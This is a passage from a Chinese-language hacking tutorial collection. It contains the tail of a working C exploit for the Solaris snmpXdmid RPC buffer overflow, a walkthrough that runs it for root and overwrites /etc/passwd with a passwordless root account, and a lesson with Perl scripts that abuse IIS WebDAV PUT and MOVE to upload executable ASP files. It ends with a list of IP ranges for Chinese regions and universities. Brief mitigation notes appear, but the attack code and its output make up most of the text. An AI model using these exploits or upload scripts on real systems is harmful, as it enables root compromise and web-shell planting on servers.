}
memcpy(&adr.sin_addr.s_addr,hp->h_addr,4);
}
sck=RPC_ANYSOCK;
if(!(cl=clnttcp_create(&adr,SNMPXDMID_PROG,SNMPXDMID_VERS,&sck,0,0))){
clnt_pcreateerror("error");exit(-1);
}
cl->cl_auth=authunix_create("localhost",0,0,0,NULL);
i=sizeof(struct sockaddr_in);
if(getsockname(sck,(struct sockaddr*)&adr,&i)==-1){
struct{unsigned int maxlen;unsigned int len;char *buf;}nb;
ioctl(sck,(('S'<<8)|2),"sockmod");
nb.maxlen=0xffff;
nb.len=sizeof(struct sockaddr_in);;
nb.buf=(char*)&adr;
ioctl(sck,(('T'<<8)|144),&nb);
}
n=ntohs(adr.sin_port);
printf("port=%d connected! ",n);fflush(stdout);
findsckcode[12+2]=(unsigned char)((n&0xff00)>>8);
findsckcode[12+3]=(unsigned char)(n&0xff);
b=&buffer[0];
for(i=0;i<1248;i++) *b++=pch[i%4];
for(i=0;i<352;i++) *b++=address[i%4];
*b=0;
b=&buffer[10000];
for(i=0;i<64000;i++) *b++=0;
for(i=0;i<64000-188;i++) *b++=nop[i%4];
for(i=0;i<strlen(findsckcode);i++) *b++=findsckcode[i];
for(i=0;i<strlen(shellcode);i++) *b++=shellcode[i];
*b=0;
req.name.len=1200+400+4;
req.name.val=&buffer[0];
req.pragma.len=128000+4;
req.pragma.val=&buffer[10000];
stat=clnt_call(cl,SNMPXDMID_ADDCOMPONENT,xdr_req,&req,xdr_void,NULL,tm);
if(stat==RPC_SUCCESS) {printf("\nerror: not vulnerable\n");exit(-1);}
printf("sent!\n");
write(sck,"/bin/uname -a\n",14);
while(1){
fd_set fds;
FD_ZERO(&fds);
FD_SET(0,&fds);
FD_SET(sck,&fds);
if(select(FD_SETSIZE,&fds,NULL,NULL,NULL)){
int cnt;
char buf[1024];
if(FD_ISSET(0,&fds)){
if((cnt=read(0,buf,1024))<1){
if(errno==EWOULDBLOCK||errno==EAGAIN) continue;
else break;
}
write(sck,buf,cnt);
}
if(FD_ISSET(sck,&fds)){
if((cnt=read(sck,buf,1024))<1){
if(errno==EWOULDBLOCK||errno==EAGAIN) continue;
else break;
}
write(1,buf,cnt);
}
}
}
}
^D
# gcc -o snmpxdmid snmpxdmid.c -lnsl –lsocket
* 编译exploit。
snmp.c: In function `main':
snmp.c:135: warning: assignment makes pointer from integer without a cast
snmp.c:172: warning: passing arg 4 of pointer to function from incompatible pointer type
# ./snmpxdmid
* 运行exploit。
copyright LAST STAGE OF DELIRIUM mar 2001 poland //lsd-pl.net/
snmpXdmid for solaris 2.7 2.8 sparc
usage: ./snmpxdmid address [-p port] -v 7|8
#./snmpxdmid 127.0.0.29 –v 8
* 溢出。
* 说明:
* address:主机IP地址。
* [-p port]:溢出端口。
* -v 7|8:solaris 2.7 (Sunos 5.7)或者solaris 2.8(Sunos 5.8)
copyright LAST STAGE OF DELIRIUM mar 2001 poland //lsd-pl.net/
snmpXdmid for solaris 2.7 2.8 sparc
adr=0x000c8f68 timeout=30 port=928 connected!
sent!
SunOS business 5.8 Generic_108528-03 sun4u sparc SUNW,Ultra-250
* 溢出成功。
id
uid=0(root) gid=0(root)
* 取得root权限。
echo "cnhack::1:0::/:/bin/bash" > /etc/passwd
* 添加一个用户名为cnhack,密码为空的管理员。
telnet localhost
* telnet主机:127.0.0.29
Trying 127.0.0.1...
Connected to localhost. Escape character is '^]'.
SunOS 5.8
login: cnhack
Password:
Last login: Sun Jul 29 19:37:19 from 127.0.0.1
Sun Microsystems Inc. SunOS 5.8 Generic February 2000
$
……
解决方法:
1) 将 /etc/rc .d/S dmi 重命为 /etc/rc .d/K07dmi (此处 代表对应运行级);再执行命令:/etc/init.d/init.dmi stop
2) 保险起见,可改变其用户权限: chmod 000 /usr/lib/dmi/snmpXdmid
『第27天』深入对iis写权限的利用
大家可能看过《远程分析IIS设置》,里面对iis的各种设置进行了分析,我这里就对iis的写权限来分析下,以下引用《远程分析IIS设置》文章对iis写权限分析内容:
写权限
测试一个目录对于web用户是否具有写权限,采用如下方法:telnet到服务器的web端口(80)并发送一个如下请求:
PUT /dir/my_file.txt HTTP/1.1
Host: iis-server
Content-Length: 10
这时服务器会返回一个100( 继续)的信息:
HTTP/1.1 100 Continue
Server: Microsoft-IIS/5.0
Date: Thu, 28 Feb 2002 15:56:00 GMT
接着,我们输入10个字母:
AAAAAAAAAA
送出这个请求后,看服务器的返回信息,如果是一个 201 Created响应:
HTTP/1.1 201 Created
Server: Microsoft-IIS/5.0
Date: Thu, 28 Feb 2002 15:56:08 GMT
Location: http://iis-server/dir/my_file.txt
Content-Length: 0
Allow: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, COPY, MOVE, PROPFIND,
PROPPATCH, SEARCH, LOCK, UNLOCK
那么就说明这个目录的写权限是开着的,反之,如果返回的是一个403错误,那么写权限就是没有开起来,如果需要你认证,并且返回一个 401(权限禁止) 的响应的话,说明是开了写权限,但是匿名用户不允许。如果一个目录同时开了”写”和“脚本和可执行程序”的话,那么web用户就可以上传一个程序并且执行它,恐怖哦%^#$!~
这里简单说明下:
PUT /dir/my_file.txt HTTP/1.1
Host: iis-server
Content-Length: 10
PUT:请求服务器将附件的实体储存在提供的请求URL处,如果该请求URL指向的资源已经存在,则附件实体应被看做是当前原始服务器上资源的修改版本。如果请求URL没有指向现存的资源,该URL将被该请求的用户代理定义成为一个新的资源,原始服务器将用该URL产生这个资源。
Host:是HTTP请求的发送地址
Content-Length:是内容长度,也就是实体长度,该长度值和上传的文件大小一致
用nc(telnet)提交很烦琐,我们这里写个简单的perl程序,来完成这个复杂的提交过程,在写代码时我们用binmode()方式打开文件,代码如下:
#!/usr/bin/perl
use I:Socket;
$ARGC = @ARGV;
if ($ARGC != 4)
{
print "usage:$0 127.0.0.1 80 kaka.exe /Scripts/file.exe\n";
exit;
}
$host = @ARGV[0];
$port = @ARGV[1];
$file = @ARGV[2];
$path = @ARGV[3];
@s=stat("$file");
$size = $s[7]; #得到文件大小
print "$file size is $size bytes\n";
my $sock = I:Socket::INET->new(Proto =>"tcp",
PeerAddr =>$host,
PeerPort =>$port) || die "Sorry! Could not connect to $host \n";
print $sock "PUT $path HTTP/1.1\n";
print $sock "Host: $host\n";
print $sock "Content-Length: $size\n\n"; #sock连接
open(FILE,"$file");
binmode(FILE); #用2进制打开文件
while (read(FILE,$char,1024)) { #读取文件数据上传
print $sock "$char";
}
print $sock "\n\n";
@req = <$sock>;
print "please wait...\n";
sleep(2);
if ($req[4]=~/200|201/){
print "upfile Succeed!!!" ; #成功显示
}
else{
print "upfile faile!!!\n\n";
print @req;#如果失败显示返回错误
}
close $sock;
close FILE;
下面我们测试下:
C:\usr\bin>perl.exe iiswt.pl 127.0.0.1 80 kaka.txt /Scripts/kaka.txt
kaka.txt size is 14 bytes
please wait...
upfile Succeed!!!
C:\Inetpub\Scripts>dir kaka.txt
驱动器 C 中的卷没有标签。
卷的序列号是 3CD1-479E
C:\Inetpub\Scripts 的目录
2004-05-05 00:37 14 kaka.txt
1 个文件 14 字节
0 个目录 3,871,080,448 可用字节
这里我们把kaka.txt成功上传到了web目录Scripts下,以为程序中用了binmode()方式(2进制)打开文件,应该可以上传其他文件,我们先测试下exe文件:
C:\usr\bin>perl.exe iiswt.pl 127.0.0.1 80 perl.exe /Scripts/perl.exe
perl.exe size is 20535 bytes
please wait...
upfile Succeed!!!
C:\Inetpub\Scripts>dir perl.exe
驱动器 C 中的卷没有标签。
卷的序列号是 3CD1-479E
C:\Inetpub\Scripts 的目录
2004-05-05 00:42 20,535 perl.exe
1 个文件 20,535 字节
0 个目录 3,871,031,296 可用字节
成功,可以上传exe了,是不是可以上传任意文件呢?接着来测试asp文件:
C:\usr\bin>perl.exe iiswt.pl 127.0.0.1 80 kaka.asp /Scripts/kaka.asp
kaka.asp size is 4 bytes
please wait...
upfile faile!!!
HTTP/1.1 100 Continue
Server: Microsoft-IIS/5.0
Date: Tue, 04 May 2004 16:45:51 GMT
HTTP/1.1 403 Forbidden
Server: Microsoft-IIS/5.0
Date: Tue, 04 May 2004 16:45:51 GMT
Connection: close
Content-Type: text/html
Content-Length: 44
<body><h2>HTTP/1.1 403 Forbidden</h2></body>
失败!!提示HTTP/1.1 403 Forbidden错误,看来直接用post方式写asp不行了,经过测试只要是iis支持的文件类型都会产生HTTP/1.1 403 Forbidden错误。
那我们怎样才可以上传iis支持的文件类型文件呢?iis除了可以执行put,post,get等动作外,还可以执行COPY, MOVE等命令,呵呵!我们这可以先把本地asp上传到远程主机web目录下的txt等其他文件,在提过copy,move命令来改为asp。
我们还是先用nc提交测试下:
D:\>nc 127.0.0.1 80
MOVE /scripts/kaka.txt HTTP/1.1
Host:127.0.0.1
Destination: http://127.0.0.1/scripts/kaka.asp
HTTP/1.1 201 Created
Server: Microsoft-IIS/5.0
Date: Sun, 05 Oct 2003 09:30:59 GMT
Location: http://127.0.0.1/scripts/x.asp
Content-Type: text/xml
Content-Length: 0
成功利用MOVE把/scripts/kaka.txt改名/scripts/kaka.asp。这样我们就可以结合put和move来完成通过iis写容易文件了:)。我们还是用perl来完成。
测试写asp成功:
C:\usr\bin>perl kaka.pl 127.0.0.1 80 kaka.asp /scripts/kaka.asp
************************************************************
codz by ≯SuperHei<QQ:123230273> && lanker<QQ:18779569>
************************************************************
kaka.asp size is 4 bytes
please wait...
upfile Succeed!!!
Modifyfile Succeed!!!
最终的iiswrite.pl代码如下(由于写本文时,在网吧对于文章中代码是先又本人打“草稿”,又lanker测试并最终完成,THX lanker。):
#!/usr/bin/perl
#The iiswrite Script
use I:Socket;
$ARGC = @ARGV;
print "*" x 60;
print "\ncodz by ≯SuperHei<QQ:123230273> && lanker<QQ:18779569>\n";
print "*" x 60,"\n";
if ($ARGC != 4)
{
print "usage:$0 127.0.0.1 80 kaka.txt /scripts/my_file.txt\n";
exit;
}
$host = @ARGV[0];
$port = @ARGV[1];
$path = @ARGV[3];
$file = @ARGV[2];
@path=split("/",$path);
$any = pop(@path);
$path1=join("/",@path);
@s=stat("$file");
$size = $s[7];
print "$file size is $size bytes\n";
my $sock = I:Socket::INET->new(Proto =>"tcp",
PeerAddr =>$host,
PeerPort =>$port) || die "Sorry! Could not connect to $host \n";
print $sock "PUT $path1/lanker.txt HTTP/1.1\n";
print $sock "Host: $host\n";
print $sock "Content-Length: $size\n\n";
open(FILE,"$file")|| die "Can't open $file";
binmode(FILE);
while (read(FILE,$char,1024)) {
print $sock "$char";
}
print $sock "\n\n";
@req = <$sock>;
print "please wait...\n";
sleep(2);
if ($req[4]=~/200|201/){
print "upfile Succeed!!!\n" ;
}
else{
print "upfile faile!!!\n";
}
close $sock;
close FILE;
my $sock = I:Socket::INET->new(Proto =>"tcp",
PeerAddr =>$host,
PeerPort =>$port) || die "Sorry! Could not connect to $host \n";
print $sock "MOVE $path1/lanker.txt HTTP/1.1\n";
print $sock "Host: $host\n";
print $sock "Destination:http://$host:$port$path\n\n\n\n";
@req = <$sock>;
if ($req[0]=~/20\d+|/){
print "Modifyfile Succeed!!!" ;
}
else{
print "upfile faile!!!";
}
close $sock;
全国IP
全国IP,从追捕中找的
010.179.000.000__010.183.255.255__甘肃____
010.184.000.000__010.188.255.255__青海____
010.189.000.000__010.193.255.255__宁夏____
010.194.000.000__010.198.255.255__新疆____
010.000.000.000__010.001.255.255__北京____
010.003.048.000__010.003.050.255__北京邮电大学____
010.011.017.000__010.013.064.255__天津____
010.017.000.000__010.022.255.255__河北____
010.023.000.000__010.028.255.255__山西____
010.029.000.000__010.033.255.255__内蒙古____
010.034.000.000__010.041.255.255__辽宁____
010.042.000.000__010.049.255.255__吉林____
010.048.000.000__010.051.255.255__黑龙江____
010.052.000.000__010.061.255.255__湖北____
010.062.000.000__010.067.255.255__湖南____
010.074.000.000__010.081.255.255__江苏____
010.082.000.000__010.088.255.255__山东____
010.089.000.000__010.094.255.255__安徽____
010.103.000.000__010.109.255.255__浙江____
010.110.000.000__010.116.255.255__福建____
010.117.000.000__010.122.255.255__江西____
010.123.000.000__010.130.255.255__广东____
010.131.000.000__010.136.255.255__海南____
010.137.000.000__010.142.255.255__广西____
010.143.000.000__010.149.255.255__四川____
010.157.000.000__010.161.255.255__贵州____
010.162.000.000__010.166.255.255__云南____
010.172.000.000__010.178.255.255__陕西____
010.167.000.000__010.171.255.255__西藏____
010.068.000.000__010.073.255.255__河南____
010.199.000.000__010.253.255.255__香港____
010.095.000.000__010.102.255.255__上海____
010.002.000.000__010.009.255.255__北京____
010.150.000.000__010.156.255.255__重庆____
010.000.000.000__010.255.255.255__未知地区____
202.113.216.000__202.113.223.255__天津美术学院____
202.113.224.000__202.113.239.255__南开大学____
202.113.242.000__202.113.243.255__天津经济技术开发区国际学校____
202.113.244.000__202.113.245.255__天津市第一中学____
202.113.248.000__202.113.255.255__中国医学科学院____
202.114.000.000__202.114.031.255__华中理工大学____
202.114.032.000__202.114.047.255__华中师范大学____
202.114.045.000__202.114.045.255__华中师范大学第一附属中学____
202.114.048.000__202.114.063.255__武汉汽车工业大学____
202.114.064.000__202.114.079.255__武汉大学____
202.114.080.000__202.114.095.255__武汉工业大学____
202.114.096.000__202.114.111.255__武汉水利水电大学____
202.114.112.000__202.114.127.255__武汉测绘科技大学____
202.114.128.000__202.114.143.255__同济医药大学____
202.114.144.000__202.114.159.255__湖北大学____
202.114.160.000__202.114.175.255__武汉交通科技大学____
202.114.176.000__202.114.191.255__湖北工业大学____
202.114.192.000__202.114.207.255__中国地质大学____
202.114.208.000__202.114.211.255__武汉邮电研究所____
202.114.212.000__202.114.215.255__华中理工大学____
202.114.216.000__202.114.223.255__襄樊大学____
202.114.224.000__202.114.239.255__中南财经大学____
202.114.240.000__202.114.255.255__武汉科技大学____
202.115.000.000__202.115.031.255__电子科技大学____
202.115.032.000__202.115.047.255__四川联合大学____
202.115.048.000__202.115.063.255__成都科技大学____
202.115.064.000__202.115.079.255__西南交通大学____
202.115.080.000__202.115.095.255__成都大学____
202.115.096.000__202.115.111.255__华西医科大学____
202.115.112.000__202.115.127.255__西南财经大学____
202.115.128.000__202.115.143.255__成都理工学院____
202.115.144.000__202.115.159.255__四川工业学院____
202.115.160.000__202.115.175.255__西南工学院____
202.115.176.000__202.115.191.255__四川农业大学____
202.115.192.000__202.115.207.255__四川师范大学____
202.115.208.000__202.115.255.255__四川____
202.116.000.000__202.116.031.255__广州暨南大学____
202.116.032.000__202.116.047.255__华南师范大学____
202.116.048.000__202.116.063.255__广东商学院____
202.116.064.000__202.116.095.255__中山大学____
202.116.096.000__202.116.111.255__孙中山医科大学____
202.116.112.000__202.116.127.255__中山医科大学____
202.116.128.000__202.116.143.255__广东工学院____
202.116.144.000__202.116.159.255__广东机械工程学院____
202.116.160.000__202.116.175.255__华南农业大学____
202.116.176.000__202.116.191.255__华南农业大学____
